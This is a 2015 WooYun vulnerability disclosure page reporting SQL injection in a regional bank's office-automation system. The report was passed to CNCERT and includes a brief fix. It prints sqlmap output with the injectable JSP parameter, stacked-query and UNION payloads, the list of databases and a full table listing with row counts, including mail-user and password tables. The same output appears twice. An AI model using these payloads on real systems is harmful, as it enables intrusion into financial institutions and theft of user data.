某地银行系统存在高危SQL注入漏洞 | wooyun-2015-0148486| WooYun.org

漏洞概要关注数(24) 关注此漏洞

缺陷编号：wooyun-2015-0148486

漏洞标题：某地银行系统存在高危SQL注入漏洞

漏洞作者：路人甲

提交时间：2015-10-21 23:17

修复时间：2015-12-07 10:42

公开时间：2015-12-07 10:42

漏洞类型：SQL注射漏洞

危害等级：高

自评Rank：15

漏洞状态：已交由第三方合作机构(cncert国家互联网应急中心)处理

漏洞来源： http://www.wooyun.org，如有疑问或需要帮助请联系 [email protected]

Tags标签：无

4人收藏收藏
分享漏洞：

漏洞详情

披露状态：

2015-10-21：细节已通知厂商并且等待厂商处理中
2015-10-23：厂商已经确认，细节仅向厂商公开
2015-11-02：细节向核心白帽子及相关领域专家公开
2015-11-12：细节向普通白帽子公开
2015-11-22：细节向实习白帽子公开
2015-12-07：细节向公众公开

简要描述：

感觉wb不太够了，赶紧打起精神来主站

详细说明：

01# 起源
http://**.**.**.**/bugs/wooyun-2010-0134796
02# SQL注入
**.**.**.**:7001/defaultroot/voiture_manager/Voituregetsource.jsp?voitureid=696360&type=chgMotorMan

Parameter: voitureid (GET)
    Type: stacked queries
    Title: Microsoft SQL Server/Sybase stacked queries (comment)
    Payload: voitureid=696360;WAITFOR DELAY '0:0:5'--&type=chgMotorMan
    Type: UNION query
    Title: Generic UNION query (NULL) - 1 column
    Payload: voitureid=696360 UNION ALL SELECT CHAR(113)+CHAR(112)+CHAR(120)+CHAR(112)+CHAR(113)+CHAR(85)+CHAR(90)+CHAR(79)+CHAR(88)+CHAR(65)+CHAR(90)+CHAR(78)+CHAR(85)+CHAR(108)+CHAR(65)+CHAR(113)+CHAR(122)+CHAR(107)+CHAR(107)+CHAR(113)-- &type=chgMotorMan
---
web application technology: Servlet 2.5, JSP, JSP 2.1
back-end DBMS: Microsoft SQL Server 2008
current user is DBA:    False
sqlmap resumed the following injection point(s) from stored session:
---
Parameter: voitureid (GET)
    Type: stacked queries
    Title: Microsoft SQL Server/Sybase stacked queries (comment)
    Payload: voitureid=696360;WAITFOR DELAY '0:0:5'--&type=chgMotorMan
    Type: UNION query
    Title: Generic UNION query (NULL) - 1 column
    Payload: voitureid=696360 UNION ALL SELECT CHAR(113)+CHAR(112)+CHAR(120)+CHAR(112)+CHAR(113)+CHAR(85)+CHAR(90)+CHAR(79)+CHAR(88)+CHAR(65)+CHAR(90)+CHAR(78)+CHAR(85)+CHAR(108)+CHAR(65)+CHAR(113)+CHAR(122)+CHAR(107)+CHAR(107)+CHAR(113)-- &type=chgMotorMan
---
web application technology: Servlet 2.5, JSP, JSP 2.1
back-end DBMS: Microsoft SQL Server 2008
available databases [8]:
[*] master
[*] model
[*] msdb
[*] oa
[*] oatest
[*] ReportServer
[*] ReportServerTempDB
[*] tempdb

24W＋邮箱账户

Database: oa
+-----------------------------------------+---------+
| Table                                   | Entries |
+-----------------------------------------+---------+
| ezoffice.oa_informationStatistics       | 268797  |
| ezoffice.OA_MAIL_USER                   | 249308  |
| ezoffice.OA_INFORMATIONBROWSER          | 150039  |
| ezoffice.WF_SEQUENCE                    | 127574  |
| ezoffice.GOV_SENDFILE_USER              | 65894   |
| ezoffice.MS_INFOLIST                    | 54177   |
| ezoffice.OA_ALLATTACH                   | 42203   |
| ezoffice.OA_MAILINTERIOR                | 41061   |
| ezoffice.OA_MAILACCESSORY               | 36696   |
| ezoffice.WF_DEALWITHLOG                 | 23262   |
| ezoffice.WF_PROCEEDACTIVITY             | 15842   |
| ezoffice.WF_PROCEEDTRANSITION           | 15305   |
| ezoffice.WF_PROCEEDTRANSITION           | 15305   |
| ezoffice.WF_DEALWITHCOMMENT             | 10500   |
| ezoffice.WF_DEALWITHCOMMENT             | 10500   |
| ezoffice.zl_user_info                   | 5301    |
| ezoffice.oa_informationLuceneTemp       | 4188    |
| ezoffice.GOV_senddocumentUpdate         | 3163    |
| ezoffice.OA_DISTRICT                    | 2476    |
| ezoffice.OA_PERSONOA_USER_PRESS_RELATIO | 2213    |
| ezoffice.wf_proceedflow                 | 2168    |
| ezoffice.OA_INFORMATIONACCESSORY        | 2033    |
| ezoffice.GOV_RECEIVEFILE                | 1676    |
| ezoffice.ORG_SYNCRTX                    | 1413    |
| ezoffice.OA_PASSWORD_HISTORY            | 1286    |
| ezoffice.ORG_RIGHTSCOPE                 | 1197    |
| dbo.oldid                               | 1148    |
| ezoffice.OA_INFORHISTORYACCESSORY       | 1087    |
| ezoffice.OA_PERSONOA_PRESS              | 977     |
| ezoffice.zl_org_info                    | 873     |
| ezoffice.OA_INFORMATIONHISTORY          | 869     |
| ezoffice.tManager                       | 499     |
| ezoffice.ORG_ORGANIZATION_USER          | 496     |
| ezoffice.ORG_ORGANIZATION_USER          | 496     |
| ezoffice.OA_SYSTEM_REMIND               | 490     |
| ezoffice.WF_READWRITECONTROL            | 482     |
| ezoffice.Document_File                  | 426     |
| ezoffice.employee_20131211101505user    | 391     |
| **.**.**.**_20131211101505user         | 391     |
| ezoffice.WF_IMMOBILITYFIELD             | 376     |
| ezoffice.OA_INFORPERSONALSTAT           | 351     |
| ezoffice.WEIBO_USER                     | 314     |
| ezoffice.employee_20131211101505scope   | 297     |
| ezoffice.GOV_DOCUMENTSENDFILE           | 238     |
| ezoffice.OA_INFORORGSTAT                | 198     |
| ezoffice.ORG_RIGHT                      | 198     |
| ezoffice.HR_RPT_INIT_FIELD              | 177     |
| ezoffice.GOV_CUSTOM_CHECKFIELD          | 164     |
| ezoffice.ORG_USER_GROUP                 | 144     |
| ezoffice.oa_patchinfo                   | 131     |
| ezoffice.ORG_ROLE_RIGHT                 | 127     |
| ezoffice.ORG_USER_ROLE                  | 114     |
| ezoffice.oa_logoin_errornumpass         | 101     |
| ezoffice.tElt                           | 88      |
| ezoffice.GOV_CUSTOM_FIELD               | 87      |
| ezoffice.tField                         | 70      |
| ezoffice.OA_MENUSET                     | 69      |
| ezoffice.gov_wflowResave                | 67      |
| ezoffice.BookMarks                      | 64      |
| ezoffice.tShow                          | 61      |
| ezoffice.WF_ACTIVITY                    | 60      |
| **.**.**.**_20131211101505             | 59      |
| ezoffice.OA_OFFICALDICTION              | 58      |
| ezoffice.WF_TRANSITION                  | 54      |
| ezoffice.SECURITY_LOG_MODULE            | 51      |
| ezoffice.SECURITY_LOG_MODULE            | 51      |
| ezoffice.WF_TRANSITIONRESTRICTION       | 49      |
| ezoffice.MS_INFODESCRIBE                | 48      |
| ezoffice.SECURITY_ONLINEUSER            | 45      |
| ezoffice.oa_portal_portlet_setting      | 44      |
| ezoffice.WF_PACKAGE                     | 43      |
| ezoffice.WF_NEEDFLOWMODULE              | 42      |
| ezoffice.WF_IMMOBILITYFORM              | 41      |
| ezoffice.OA_INFORMATIONCHANNEL          | 34      |
| ezoffice.WF_WORK_ACCESSORY              | 34      |
| ezoffice.WF_WORK_ACCESSORY              | 34      |
| ezoffice.OA_PERSONONDUTY                | 32      |
| ezoffice.CUSTOMER_CENTER                | 26      |
| ezoffice.OA_INFORMATIONCOMMENT          | 25      |
| ezoffice.WF_OA_RELATEFIELD              | 22      |
| ezoffice.tSign                          | 19      |
| ezoffice.MS_COUNT                       | 16      |
| ezoffice.GOV_senddocumentTopical        | 15      |
| ezoffice.OA_DIARYCLASS                  | 15      |
| ezoffice.OA_DIARYCLASS                  | 15      |
| ezoffice.tArea                          | 14      |
| ezoffice.tPage                          | 14      |
| ezoffice.WF_WORKFLOWWRITECONTROL        | 14      |
| ezoffice.GOV_SENDFILECHECKWITHWF_ACC    | 12      |
| ezoffice.whir$t3008                     | 12      |
| ezoffice.GOV_SENDFILECHECKWITHWORKFLOW  | 11      |
| ezoffice.OA_PERSONALSTAT                | 11      |
| **.**.**.**_tmppassword                | 11      |
| ezoffice.tTable                         | 11      |
| ezoffice.employee_20131211101505role    | 10      |
| ezoffice.GOV_documentUnit               | 10      |
| ezoffice.gov_ReceiveFileSeq             | 10      |
| ezoffice.MS_MODEL                       | 10      |
| ezoffice.oa_portal_type                 | 10      |
| ezoffice.Template_BookMarks             | 10      |
| ezoffice.Template_BookMarks             | 10      |
| ezoffice.employee_20131211101505group   | 9       |
| ezoffice.employee_20131211101505group   | 9       |
| ezoffice.HR_S_INCOME_TAX                | 9       |
| ezoffice.oa_ext_table                   | 9       |
| ezoffice.oa_graphreport_type            | 9       |
| ezoffice.oa_graphreport_type            | 9       |
| ezoffice.oa_portal_template             | 9       |
| ezoffice.tAreatype                      | 9       |
| ezoffice.wf_oldCommentlog               | 9       |
| ezoffice.WF_WORKFLOW_DESIGNER           | 9       |
| ezoffice.WF_WORKFLOWPROCESS             | 9       |
| ezoffice.HR_S_RATIO_SETTING             | 8       |
| ezoffice.OA_EMPLOYEE_STATUS             | 8       |
| ezoffice.oa_informationStatisticsType   | 8       |
| ezoffice.oa_maturity_alert_settings     | 8       |
| ezoffice.OA_RELATIONMODULE              | 8       |
| **.**.**.**_LoginPageSetTab            | 8       |
| ezoffice.oa_ext_show                    | 7       |
| ezoffice.OA_RELATIONOBJECT              | 7       |
| ezoffice.whir$t3011                     | 7       |
| ezoffice.oa_portal_layout_portlet       | 6       |
| ezoffice.oa_portal_layout_portlet       | 6       |
| ezoffice.GOV_CUSTOM_DOCUMNET            | 5       |
| ezoffice.gov_senddocumentNum            | 5       |
| ezoffice.gov_senddocumentword           | 5       |
| ezoffice.OA_DEPARTMENTSTYLE             | 5       |
| ezoffice.whir$t3009                     | 5       |
| ezoffice.hr_kq_type                     | 4       |
| ezoffice.oa_ext_type                    | 4       |
| ezoffice.OA_STATUS_DETAIL               | 4       |
| ezoffice.tModel                         | 4       |
| ezoffice.tType                          | 4       |
| ezoffice.EZ_FLOW_GE_PROPERTY            | 3       |
| ezoffice.OA_DOSSIER_GDSET               | 3       |
| ezoffice.OA_EDITION                     | 3       |
| ezoffice.oa_interface_setting           | 3       |
| ezoffice.OA_MAIL_USERSET                | 3       |
| ezoffice.SFT_XXBS_JFBZSZ                | 3       |
| ezoffice.Template_File                  | 3       |
| ezoffice.tSession                       | 3       |
| ezoffice.UNION_TASKFROM                 | 3       |
| ezoffice.OA_CARDEMPINFO                 | 2       |
| ezoffice.OA_INFORMATION_Department_XMl  | 2       |
| ezoffice.OA_INFORMATION_Department_XMl  | 2       |
| ezoffice.OA_MAILUSERBOX                 | 2       |
| ezoffice.OA_NOTEPAPER                   | 2       |
| ezoffice.OA_ORGWRAP                     | 2       |
| ezoffice.oa_taskView                    | 2       |
| ezoffice.tCode                          | 2       |
| ezoffice.tSeq                           | 2       |
| ezoffice.DOCUMENT_EXT                   | 1       |
| ezoffice.DOCUMENT_EXT                   | 1       |
| ezoffice.EZ_FLOW_RE_MYAUTOTRAN          | 1       |
| ezoffice.EZ_FLOW_RU_EXECUTION           | 1       |
| ezoffice.ez_form_module                 | 1       |
| ezoffice.GOV_receivedocumentBASEINFO    | 1       |
| ezoffice.GOV_senddocumentBASEINFO       | 1       |
| ezoffice.hr_s_fffs_setting              | 1       |
| ezoffice.OA_CUSTOMDESKTOPLAYOUT         | 1       |
| ezoffice.OA_DUTY                        | 1       |
| ezoffice.OA_EVENTATTENDER               | 1       |
| ezoffice.OA_MAIL_H_SET                  | 1       |
| ezoffice.OA_PERSONSETUP                 | 1       |
| ezoffice.oa_portal_menu_setting         | 1       |
| ezoffice.oa_portal_menu_setting         | 1       |
| ezoffice.OA_SEQ                         | 1       |
| ezoffice.oa_sys_mailremind              | 1       |
| ezoffice.OA_UNITINFO                    | 1       |
| ezoffice.oa_wf_overdate                 | 1       |
| ezoffice.ORG_DOMAIN                     | 1       |
| **.**.**.**_group_class                | 1       |
| **.**.**.**_group_class                | 1       |
| ezoffice.ORG_MANAGER                    | 1       |
| **.**.**.**_role_class                 | 1       |
| **.**.**.**_role_class                 | 1       |
| ezoffice.SECURITY_DOG                   | 1       |
| ezoffice.SECURITY_IP                    | 1       |
| ezoffice.WEIBO_COMMENT                  | 1       |
| ezoffice.WEIBO_FAVORITE                 | 1       |
+-----------------------------------------+---------+

漏洞证明：

01# 起源
http://**.**.**.**/bugs/wooyun-2010-0134796
02# SQL注入
**.**.**.**:7001/defaultroot/voiture_manager/Voituregetsource.jsp?voitureid=696360&type=chgMotorMan

Parameter: voitureid (GET)
    Type: stacked queries
    Title: Microsoft SQL Server/Sybase stacked queries (comment)
    Payload: voitureid=696360;WAITFOR DELAY '0:0:5'--&type=chgMotorMan
    Type: UNION query
    Title: Generic UNION query (NULL) - 1 column
    Payload: voitureid=696360 UNION ALL SELECT CHAR(113)+CHAR(112)+CHAR(120)+CHAR(112)+CHAR(113)+CHAR(85)+CHAR(90)+CHAR(79)+CHAR(88)+CHAR(65)+CHAR(90)+CHAR(78)+CHAR(85)+CHAR(108)+CHAR(65)+CHAR(113)+CHAR(122)+CHAR(107)+CHAR(107)+CHAR(113)-- &type=chgMotorMan
---
web application technology: Servlet 2.5, JSP, JSP 2.1
back-end DBMS: Microsoft SQL Server 2008
current user is DBA:    False
sqlmap resumed the following injection point(s) from stored session:
---
Parameter: voitureid (GET)
    Type: stacked queries
    Title: Microsoft SQL Server/Sybase stacked queries (comment)
    Payload: voitureid=696360;WAITFOR DELAY '0:0:5'--&type=chgMotorMan
    Type: UNION query
    Title: Generic UNION query (NULL) - 1 column
    Payload: voitureid=696360 UNION ALL SELECT CHAR(113)+CHAR(112)+CHAR(120)+CHAR(112)+CHAR(113)+CHAR(85)+CHAR(90)+CHAR(79)+CHAR(88)+CHAR(65)+CHAR(90)+CHAR(78)+CHAR(85)+CHAR(108)+CHAR(65)+CHAR(113)+CHAR(122)+CHAR(107)+CHAR(107)+CHAR(113)-- &type=chgMotorMan
---
web application technology: Servlet 2.5, JSP, JSP 2.1
back-end DBMS: Microsoft SQL Server 2008
available databases [8]:
[*] master
[*] model
[*] msdb
[*] oa
[*] oatest
[*] ReportServer
[*] ReportServerTempDB
[*] tempdb

24W＋邮箱账户

Database: oa
+-----------------------------------------+---------+
| Table                                   | Entries |
+-----------------------------------------+---------+
| ezoffice.oa_informationStatistics       | 268797  |
| ezoffice.OA_MAIL_USER                   | 249308  |
| ezoffice.OA_INFORMATIONBROWSER          | 150039  |
| ezoffice.WF_SEQUENCE                    | 127574  |
| ezoffice.GOV_SENDFILE_USER              | 65894   |
| ezoffice.MS_INFOLIST                    | 54177   |
| ezoffice.OA_ALLATTACH                   | 42203   |
| ezoffice.OA_MAILINTERIOR                | 41061   |
| ezoffice.OA_MAILACCESSORY               | 36696   |
| ezoffice.WF_DEALWITHLOG                 | 23262   |
| ezoffice.WF_PROCEEDACTIVITY             | 15842   |
| ezoffice.WF_PROCEEDTRANSITION           | 15305   |
| ezoffice.WF_PROCEEDTRANSITION           | 15305   |
| ezoffice.WF_DEALWITHCOMMENT             | 10500   |
| ezoffice.WF_DEALWITHCOMMENT             | 10500   |
| ezoffice.zl_user_info                   | 5301    |
| ezoffice.oa_informationLuceneTemp       | 4188    |
| ezoffice.GOV_senddocumentUpdate         | 3163    |
| ezoffice.OA_DISTRICT                    | 2476    |
| ezoffice.OA_PERSONOA_USER_PRESS_RELATIO | 2213    |
| ezoffice.wf_proceedflow                 | 2168    |
| ezoffice.OA_INFORMATIONACCESSORY        | 2033    |
| ezoffice.GOV_RECEIVEFILE                | 1676    |
| ezoffice.ORG_SYNCRTX                    | 1413    |
| ezoffice.OA_PASSWORD_HISTORY            | 1286    |
| ezoffice.ORG_RIGHTSCOPE                 | 1197    |
| dbo.oldid                               | 1148    |
| ezoffice.OA_INFORHISTORYACCESSORY       | 1087    |
| ezoffice.OA_PERSONOA_PRESS              | 977     |
| ezoffice.zl_org_info                    | 873     |
| ezoffice.OA_INFORMATIONHISTORY          | 869     |
| ezoffice.tManager                       | 499     |
| ezoffice.ORG_ORGANIZATION_USER          | 496     |
| ezoffice.ORG_ORGANIZATION_USER          | 496     |
| ezoffice.OA_SYSTEM_REMIND               | 490     |
| ezoffice.WF_READWRITECONTROL            | 482     |
| ezoffice.Document_File                  | 426     |
| ezoffice.employee_20131211101505user    | 391     |
| **.**.**.**_20131211101505user         | 391     |
| ezoffice.WF_IMMOBILITYFIELD             | 376     |
| ezoffice.OA_INFORPERSONALSTAT           | 351     |
| ezoffice.WEIBO_USER                     | 314     |
| ezoffice.employee_20131211101505scope   | 297     |
| ezoffice.GOV_DOCUMENTSENDFILE           | 238     |
| ezoffice.OA_INFORORGSTAT                | 198     |
| ezoffice.ORG_RIGHT                      | 198     |
| ezoffice.HR_RPT_INIT_FIELD              | 177     |
| ezoffice.GOV_CUSTOM_CHECKFIELD          | 164     |
| ezoffice.ORG_USER_GROUP                 | 144     |
| ezoffice.oa_patchinfo                   | 131     |
| ezoffice.ORG_ROLE_RIGHT                 | 127     |
| ezoffice.ORG_USER_ROLE                  | 114     |
| ezoffice.oa_logoin_errornumpass         | 101     |
| ezoffice.tElt                           | 88      |
| ezoffice.GOV_CUSTOM_FIELD               | 87      |
| ezoffice.tField                         | 70      |
| ezoffice.OA_MENUSET                     | 69      |
| ezoffice.gov_wflowResave                | 67      |
| ezoffice.BookMarks                      | 64      |
| ezoffice.tShow                          | 61      |
| ezoffice.WF_ACTIVITY                    | 60      |
| **.**.**.**_20131211101505             | 59      |
| ezoffice.OA_OFFICALDICTION              | 58      |
| ezoffice.WF_TRANSITION                  | 54      |
| ezoffice.SECURITY_LOG_MODULE            | 51      |
| ezoffice.SECURITY_LOG_MODULE            | 51      |
| ezoffice.WF_TRANSITIONRESTRICTION       | 49      |
| ezoffice.MS_INFODESCRIBE                | 48      |
| ezoffice.SECURITY_ONLINEUSER            | 45      |
| ezoffice.oa_portal_portlet_setting      | 44      |
| ezoffice.WF_PACKAGE                     | 43      |
| ezoffice.WF_NEEDFLOWMODULE              | 42      |
| ezoffice.WF_IMMOBILITYFORM              | 41      |
| ezoffice.OA_INFORMATIONCHANNEL          | 34      |
| ezoffice.WF_WORK_ACCESSORY              | 34      |
| ezoffice.WF_WORK_ACCESSORY              | 34      |
| ezoffice.OA_PERSONONDUTY                | 32      |
| ezoffice.CUSTOMER_CENTER                | 26      |
| ezoffice.OA_INFORMATIONCOMMENT          | 25      |
| ezoffice.WF_OA_RELATEFIELD              | 22      |
| ezoffice.tSign                          | 19      |
| ezoffice.MS_COUNT                       | 16      |
| ezoffice.GOV_senddocumentTopical        | 15      |
| ezoffice.OA_DIARYCLASS                  | 15      |
| ezoffice.OA_DIARYCLASS                  | 15      |
| ezoffice.tArea                          | 14      |
| ezoffice.tPage                          | 14      |
| ezoffice.WF_WORKFLOWWRITECONTROL        | 14      |
| ezoffice.GOV_SENDFILECHECKWITHWF_ACC    | 12      |
| ezoffice.whir$t3008                     | 12      |
| ezoffice.GOV_SENDFILECHECKWITHWORKFLOW  | 11      |
| ezoffice.OA_PERSONALSTAT                | 11      |
| **.**.**.**_tmppassword                | 11      |
| ezoffice.tTable                         | 11      |
| ezoffice.employee_20131211101505role    | 10      |
| ezoffice.GOV_documentUnit               | 10      |
| ezoffice.gov_ReceiveFileSeq             | 10      |
| ezoffice.MS_MODEL                       | 10      |
| ezoffice.oa_portal_type                 | 10      |
| ezoffice.Template_BookMarks             | 10      |
| ezoffice.Template_BookMarks             | 10      |
| ezoffice.employee_20131211101505group   | 9       |
| ezoffice.employee_20131211101505group   | 9       |
| ezoffice.HR_S_INCOME_TAX                | 9       |
| ezoffice.oa_ext_table                   | 9       |
| ezoffice.oa_graphreport_type            | 9       |
| ezoffice.oa_graphreport_type            | 9       |
| ezoffice.oa_portal_template             | 9       |
| ezoffice.tAreatype                      | 9       |
| ezoffice.wf_oldCommentlog               | 9       |
| ezoffice.WF_WORKFLOW_DESIGNER           | 9       |
| ezoffice.WF_WORKFLOWPROCESS             | 9       |
| ezoffice.HR_S_RATIO_SETTING             | 8       |
| ezoffice.OA_EMPLOYEE_STATUS             | 8       |
| ezoffice.oa_informationStatisticsType   | 8       |
| ezoffice.oa_maturity_alert_settings     | 8       |
| ezoffice.OA_RELATIONMODULE              | 8       |
| **.**.**.**_LoginPageSetTab            | 8       |
| ezoffice.oa_ext_show                    | 7       |
| ezoffice.OA_RELATIONOBJECT              | 7       |
| ezoffice.whir$t3011                     | 7       |
| ezoffice.oa_portal_layout_portlet       | 6       |
| ezoffice.oa_portal_layout_portlet       | 6       |
| ezoffice.GOV_CUSTOM_DOCUMNET            | 5       |
| ezoffice.gov_senddocumentNum            | 5       |
| ezoffice.gov_senddocumentword           | 5       |
| ezoffice.OA_DEPARTMENTSTYLE             | 5       |
| ezoffice.whir$t3009                     | 5       |
| ezoffice.hr_kq_type                     | 4       |
| ezoffice.oa_ext_type                    | 4       |
| ezoffice.OA_STATUS_DETAIL               | 4       |
| ezoffice.tModel                         | 4       |
| ezoffice.tType                          | 4       |
| ezoffice.EZ_FLOW_GE_PROPERTY            | 3       |
| ezoffice.OA_DOSSIER_GDSET               | 3       |
| ezoffice.OA_EDITION                     | 3       |
| ezoffice.oa_interface_setting           | 3       |
| ezoffice.OA_MAIL_USERSET                | 3       |
| ezoffice.SFT_XXBS_JFBZSZ                | 3       |
| ezoffice.Template_File                  | 3       |
| ezoffice.tSession                       | 3       |
| ezoffice.UNION_TASKFROM                 | 3       |
| ezoffice.OA_CARDEMPINFO                 | 2       |
| ezoffice.OA_INFORMATION_Department_XMl  | 2       |
| ezoffice.OA_INFORMATION_Department_XMl  | 2       |
| ezoffice.OA_MAILUSERBOX                 | 2       |
| ezoffice.OA_NOTEPAPER                   | 2       |
| ezoffice.OA_ORGWRAP                     | 2       |
| ezoffice.oa_taskView                    | 2       |
| ezoffice.tCode                          | 2       |
| ezoffice.tSeq                           | 2       |
| ezoffice.DOCUMENT_EXT                   | 1       |
| ezoffice.DOCUMENT_EXT                   | 1       |
| ezoffice.EZ_FLOW_RE_MYAUTOTRAN          | 1       |
| ezoffice.EZ_FLOW_RU_EXECUTION           | 1       |
| ezoffice.ez_form_module                 | 1       |
| ezoffice.GOV_receivedocumentBASEINFO    | 1       |
| ezoffice.GOV_senddocumentBASEINFO       | 1       |
| ezoffice.hr_s_fffs_setting              | 1       |
| ezoffice.OA_CUSTOMDESKTOPLAYOUT         | 1       |
| ezoffice.OA_DUTY                        | 1       |
| ezoffice.OA_EVENTATTENDER               | 1       |
| ezoffice.OA_MAIL_H_SET                  | 1       |
| ezoffice.OA_PERSONSETUP                 | 1       |
| ezoffice.oa_portal_menu_setting         | 1       |
| ezoffice.oa_portal_menu_setting         | 1       |
| ezoffice.OA_SEQ                         | 1       |
| ezoffice.oa_sys_mailremind              | 1       |
| ezoffice.OA_UNITINFO                    | 1       |
| ezoffice.oa_wf_overdate                 | 1       |
| ezoffice.ORG_DOMAIN                     | 1       |
| **.**.**.**_group_class                | 1       |
| **.**.**.**_group_class                | 1       |
| ezoffice.ORG_MANAGER                    | 1       |
| **.**.**.**_role_class                 | 1       |
| **.**.**.**_role_class                 | 1       |
| ezoffice.SECURITY_DOG                   | 1       |
| ezoffice.SECURITY_IP                    | 1       |
| ezoffice.WEIBO_COMMENT                  | 1       |
| ezoffice.WEIBO_FAVORITE                 | 1       |
+-----------------------------------------+---------+

修复方案：

voitureid参数整型转换

版权声明：转载请注明来源路人甲@乌云

漏洞回应

厂商回应：

危害等级：高

漏洞Rank：10

确认时间：2015-10-23 10:40

厂商回复：

CNVD确认并复现所述情况,已经转由CNCERT向银行业信息化主管部门通报,由其后续协调网站管理单位处置同时下发安徽分中心.

WooYun.org

漏洞概要关注数(24) 关注此漏洞

缺陷编号：wooyun-2015-0148486

漏洞标题：某地银行系统存在高危SQL注入漏洞

相关厂商：cncert

漏洞作者：路人甲

提交时间：2015-10-21 23:17

修复时间：2015-12-07 10:42

公开时间：2015-12-07 10:42

漏洞类型：SQL注射漏洞

危害等级：高

自评Rank：15

漏洞状态：已交由第三方合作机构(cncert国家互联网应急中心)处理

漏洞来源： http://www.wooyun.org，如有疑问或需要帮助请联系 [email protected]

Tags标签：无

4人收藏收藏
分享漏洞：

漏洞详情

披露状态：

简要描述：

详细说明：

漏洞证明：

修复方案：

版权声明：转载请注明来源路人甲@乌云

漏洞回应

厂商回应：

厂商回复：

最新状态：

WooYun.org

漏洞概要 关注数(24) 关注此漏洞

缺陷编号：wooyun-2015-0148486

漏洞标题：某地银行系统存在高危SQL注入漏洞

相关厂商：cncert

漏洞作者： 路人甲

提交时间：2015-10-21 23:17

修复时间：2015-12-07 10:42

公开时间：2015-12-07 10:42

漏洞类型：SQL注射漏洞

危害等级：高

自评Rank：15

漏洞状态：已交由第三方合作机构(cncert国家互联网应急中心)处理

Tags标签： 无

4人收藏 收藏 var token=""; var id="wooyun-2015-0148486"; $(".btn-fav").click(function(){ CollectBug(id,token); }); 分享漏洞：

漏洞详情

披露状态：

简要描述：

详细说明：

漏洞证明：

修复方案：

版权声明：转载请注明来源 路人甲@乌云

漏洞回应

厂商回应：

厂商回复：

最新状态：

漏洞概要关注数(24) 关注此漏洞

漏洞作者：路人甲

Tags标签：无

4人收藏收藏
分享漏洞：

版权声明：转载请注明来源路人甲@乌云